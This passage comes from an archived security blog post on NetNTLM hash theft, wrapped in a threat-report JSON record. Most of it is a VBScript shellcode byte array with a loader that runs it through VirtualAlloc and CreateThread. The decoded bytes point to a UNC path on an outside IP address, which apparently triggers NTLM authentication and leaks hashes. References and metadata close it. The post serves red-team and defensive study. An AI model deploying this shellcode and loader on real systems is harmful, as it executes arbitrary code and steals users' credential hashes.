_\r\n\u0026amp;H1d, \u0026amp;H33, \u0026amp;Hf6, \u0026amp;Hfc, \u0026amp;H8a, \u0026amp;H07, \u0026amp;H3c, \u0026amp;H05, \u0026amp;H0f,\r\n\u0026amp;H44, \u0026amp;Hc6, \u0026amp;Haa, \u0026amp;He2, \u0026amp;Hf6, \u0026amp;He8, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05,\r\n\u0026amp;H05, \u0026amp;H5e, _\r\n\u0026amp;H8b, \u0026amp;Hfe, \u0026amp;H81, \u0026amp;Hc6, \u0026amp;H29, \u0026amp;H01, \u0026amp;H05, \u0026amp;H05, \u0026amp;Hb9,\r\n\u0026amp;H02, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;Hfc, \u0026amp;Had, \u0026amp;H01, \u0026amp;H3c, \u0026amp;H07,\r\n\u0026amp;He2, \u0026amp;Hfa, _\r\n\u0026amp;H56, \u0026amp;Hb9, \u0026amp;H8d, \u0026amp;H10, \u0026amp;Hb7, \u0026amp;Hf8, \u0026amp;He8, \u0026amp;H5f, \u0026amp;H05,\r\n\u0026amp;H05, \u0026amp;H05, \u0026amp;H68, \u0026amp;H31, \u0026amp;H01, \u0026amp;H05, \u0026amp;H05, \u0026amp;Hff, \u0026amp;Hd0,\r\n\u0026amp;Hb9, \u0026amp;He0, _\r\n\u0026amp;H53, \u0026amp;H31, \u0026amp;H4b, \u0026amp;He8, \u0026amp;H4e, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;Hb9,\r\n\u0026amp;Hac, \u0026amp;Hd5, \u0026amp;Haa, \u0026amp;H88, \u0026amp;H8b, \u0026amp;Hf0, \u0026amp;He8, \u0026amp;H42, \u0026amp;H05,\r\n\u0026amp;H05, \u0026amp;H05, _\r\n\u0026amp;H6a, \u0026amp;H05, \u0026amp;H68, \u0026amp;H80, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;H6a, \u0026amp;H03,\r\n\u0026amp;H6a, \u0026amp;H05, \u0026amp;H6a, \u0026amp;H01, \u0026amp;H68, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;H80,\r\n\u0026amp;H68, \u0026amp;H3e, _\r\n\u0026amp;H01, \u0026amp;H05, \u0026amp;H05, \u0026amp;Hff, \u0026amp;Hd0, \u0026amp;H6a, \u0026amp;H05, \u0026amp;Hff, \u0026amp;Hd6,\r\n\u0026amp;H33, \u0026amp;Hc0, \u0026amp;H5e, \u0026amp;Hc3, \u0026amp;H33, \u0026amp;Hd2, \u0026amp;Heb, \u0026amp;H10, \u0026amp;Hc1,\r\n\u0026amp;Hca, \u0026amp;H0d, _\r\n\u0026amp;H3c, \u0026amp;H61, \u0026amp;H0f, \u0026amp;Hbe, \u0026amp;Hc0, \u0026amp;H7c, \u0026amp;H03, \u0026amp;H83, \u0026amp;He8,\r\n\u0026amp;H20, \u0026amp;H03, \u0026amp;Hd0, \u0026amp;H41, \u0026amp;H8a, \u0026amp;H01, \u0026amp;H84, \u0026amp;Hc0, \u0026amp;H75,\r\n\u0026amp;Hea, \u0026amp;H8b, _\r\n\u0026amp;Hc2, \u0026amp;Hc3, \u0026amp;H8d, \u0026amp;H41, \u0026amp;Hf8, \u0026amp;Hc3, \u0026amp;H55, \u0026amp;H8b, \u0026amp;Hec,\r\n\u0026amp;H83, \u0026amp;Hec, \u0026amp;H14, \u0026amp;H53, \u0026amp;H56, \u0026amp;H57, \u0026amp;H89, \u0026amp;H4d, \u0026amp;Hf4,\r\n\u0026amp;H64, \u0026amp;Ha1, _\r\n\u0026amp;H30, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;H89, \u0026amp;H45, \u0026amp;Hfc, \u0026amp;H8b, \u0026amp;H45,\r\n\u0026amp;Hfc, \u0026amp;H8b, \u0026amp;H40, \u0026amp;H0c, \u0026amp;H8b, \u0026amp;H40, \u0026amp;H14, \u0026amp;H89, \u0026amp;H45,\r\n\u0026amp;Hec, \u0026amp;H8b, _\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 18 of 20\n\n\u0026amp;Hf8, \u0026amp;H8b, \u0026amp;Hcf, \u0026amp;He8, \u0026amp;Hd2, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;H8b,\r\n\u0026amp;H70, \u0026amp;H18, \u0026amp;H8b, \u0026amp;H3f, \u0026amp;H85, \u0026amp;Hf6, \u0026amp;H74, \u0026amp;H4f, \u0026amp;H8b,\r\n\u0026amp;H46, \u0026amp;H3c, _\r\n\u0026amp;H8b, \u0026amp;H5c, \u0026amp;H30, \u0026amp;H78, \u0026amp;H85, \u0026amp;Hdb, \u0026amp;H74, \u0026amp;H44, \u0026amp;H8b,\r\n\u0026amp;H4c, \u0026amp;H33, \u0026amp;H0c, \u0026amp;H03, \u0026amp;Hce, \u0026amp;He8, \u0026amp;H96, \u0026amp;Hff, \u0026amp;Hff,\r\n\u0026amp;Hff, \u0026amp;H8b, _\r\n\u0026amp;H4c, \u0026amp;H33, \u0026amp;H20, \u0026amp;H89, \u0026amp;H45, \u0026amp;Hf8, \u0026amp;H33, \u0026amp;Hc0, \u0026amp;H03,\r\n\u0026amp;Hce, \u0026amp;H89, \u0026amp;H4d, \u0026amp;Hf0, \u0026amp;H89, \u0026amp;H45, \u0026amp;Hfc, \u0026amp;H39, \u0026amp;H44,\r\n\u0026amp;H33, \u0026amp;H18, _\r\n\u0026amp;H76, \u0026amp;H22, \u0026amp;H8b, \u0026amp;H0c, \u0026amp;H81, \u0026amp;H03, \u0026amp;Hce, \u0026amp;He8, \u0026amp;H75,\r\n\u0026amp;Hff, \u0026amp;Hff, \u0026amp;Hff, \u0026amp;H03, \u0026amp;H45, \u0026amp;Hf8, \u0026amp;H39, \u0026amp;H45, \u0026amp;Hf4,\r\n\u0026amp;H74, \u0026amp;H1c, _\r\n\u0026amp;H8b, \u0026amp;H45, \u0026amp;Hfc, \u0026amp;H8b, \u0026amp;H4d, \u0026amp;Hf0, \u0026amp;H40, \u0026amp;H89, \u0026amp;H45,\r\n\u0026amp;Hfc, \u0026amp;H3b, \u0026amp;H44, \u0026amp;H33, \u0026amp;H18, \u0026amp;H72, \u0026amp;Hde, \u0026amp;H3b, \u0026amp;H7d,\r\n\u0026amp;Hec, \u0026amp;H75, _\r\n\u0026amp;H9c, \u0026amp;H33, \u0026amp;Hc0, \u0026amp;H5f, \u0026amp;H5e, \u0026amp;H5b, \u0026amp;Hc9, \u0026amp;Hc3, \u0026amp;H8b,\r\n\u0026amp;H4d, \u0026amp;Hfc, \u0026amp;H8b, \u0026amp;H44, \u0026amp;H33, \u0026amp;H24, \u0026amp;H8d, \u0026amp;H04, \u0026amp;H48,\r\n\u0026amp;H0f, \u0026amp;Hb7, _\r\n\u0026amp;H0c, \u0026amp;H30, \u0026amp;H8b, \u0026amp;H44, \u0026amp;H33, \u0026amp;H1c, \u0026amp;H8d, \u0026amp;H04, \u0026amp;H88,\r\n\u0026amp;H8b, \u0026amp;H04, \u0026amp;H30, \u0026amp;H03, \u0026amp;Hc6, \u0026amp;Heb, \u0026amp;Hdf, \u0026amp;H21, \u0026amp;H05,\r\n\u0026amp;H05, \u0026amp;H05, _\r\n\u0026amp;H50, \u0026amp;H05, \u0026amp;H05, \u0026amp;H05, \u0026amp;H6b, \u0026amp;H65, \u0026amp;H72, \u0026amp;H6e, \u0026amp;H65,\r\n\u0026amp;H6c, \u0026amp;H33, \u0026amp;H32, \u0026amp;H2e, \u0026amp;H64, \u0026amp;H6c, \u0026amp;H6c, \u0026amp;H05, \u0026amp;H2f,\r\n\u0026amp;H2f, \u0026amp;H33, _\r\n\u0026amp;H35, \u0026amp;H2e, \u0026amp;H31, \u0026amp;H36, \u0026amp;H34, \u0026amp;H2e, \u0026amp;H31, \u0026amp;H35, \u0026amp;H33,\r\n\u0026amp;H2e, \u0026amp;H32, \u0026amp;H32, \u0026amp;H34, \u0026amp;H2f, \u0026amp;H61, \u0026amp;H61, \u0026amp;H05)\r\nscLocation = DX.VirtualAlloc(0, UBound(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)\r\nFor i =LBound(shellcode) to UBound(shellcode)\r\nDX.NumPut shellcode(i),scLocation,i\r\nNext\r\nthread = DX.CreateThread (0,0,scLocation,0,0)\r\n[/code]\r\nhttps://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vbs\r\nThere might be many other ways in Windows. You never know! 🙂\r\nReferences\r\nhttps://attack.mitre.org/techniques/T1187/\r\n[tweet https://twitter.com/itsreallynick/status/932630874847358977]\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 19 of 20\n\nMentioned in the SANS SEC599: Defeating Advanced Adversaries – Purple Team Tactics \u0026 Kill Chain Defenses\r\ncourse.\r\nhttps://www.sans.org/course/defeating-advanced-adversaries-kill-chain-defenses\r\nSource: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nhttps://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/"
	],
	"report_names": [
		"places-of-interest-in-stealing-netntlm-hashes"
	],
	"threat_actors": [],
	"ts_created_at": 1775434152,
	"ts_updated_at": 1775791252,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/087407807b976f1b07d151414b2149778dae876a.pdf",
		"text": "https://archive.orkl.eu/087407807b976f1b07d151414b2149778dae876a.txt",
		"img": "https://archive.orkl.eu/087407807b976f1b07d151414b2149778dae876a.jpg"
	}
}